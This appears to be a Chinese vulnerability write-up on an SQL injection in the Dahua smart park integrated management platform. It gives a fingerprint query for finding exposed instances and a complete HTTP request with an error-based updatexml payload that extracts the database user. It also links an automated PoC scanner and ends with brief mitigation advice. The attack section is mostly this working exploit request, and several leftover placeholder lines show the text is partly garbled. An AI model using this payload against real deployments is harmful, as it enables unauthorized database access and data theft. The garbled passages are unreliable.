大华智慧园区综合管理平台SQL注入漏洞
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台SQL注入漏洞
-
一、 产品简介
-
二、 漏洞概述
-
三、 复现环境
-
四、 漏洞复现
-
- burp PoC验证
- 查询当前用户
- 小龙POC检测:
-
五、 修复建议
免责声明:请不要使用文章中的相关技术进行不当测试。因为传播或利用本文提供的信息或工具而导致的所有直接或间接损失和后果,都由使用者自行负责。此文章仅限于学习目的参考使用。
(此处保持与原文相同的数学公式...和英文内容)
(此处保持与原文相同的数学公式...和英文内容)
(此处保持与原文相同的数学公式...和英文内容)
(此处保持与原文相同的英文句子)
一、 产品简介
大华智慧园区建设的综合管理系统作为一款具有多种功能的系统,在其运行过程中具备园区运营功能、资源调配能力和智能服务功能。该系统旨在优化资源配置并提升效率,并且能够满足多层次或多种样的管理需求;此外,在提供智能化的服务内容的同时,并且提升了用户体验
二、 漏洞概述
该平台未能对用户的输入实施有效的过滤措施,并将未经过滤的输入直接整合到SQL查询语句中
三、 复现环境
鹰图指纹:web.body=“/WPMS/asset/lib/gridster/”

四、 漏洞复现
burp PoC验证
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
代码解释
查询当前用户
如果识别到了XPTAH这一明显的标志物,则表明发生了报错注入现象;只要观察到这一特征,则可判断系统中存在报错注入行为。

小龙POC检测:
小龙POC传送门: 小龙POC工具
小龙POC检测脚本也可以自动去检测,一阵哈拉少

五、 修复建议
限制访问来源地址,如非必要,不要将系统开放在互联网上。等待官方补丁
全部评论 (0)
还没有任何评论哟~
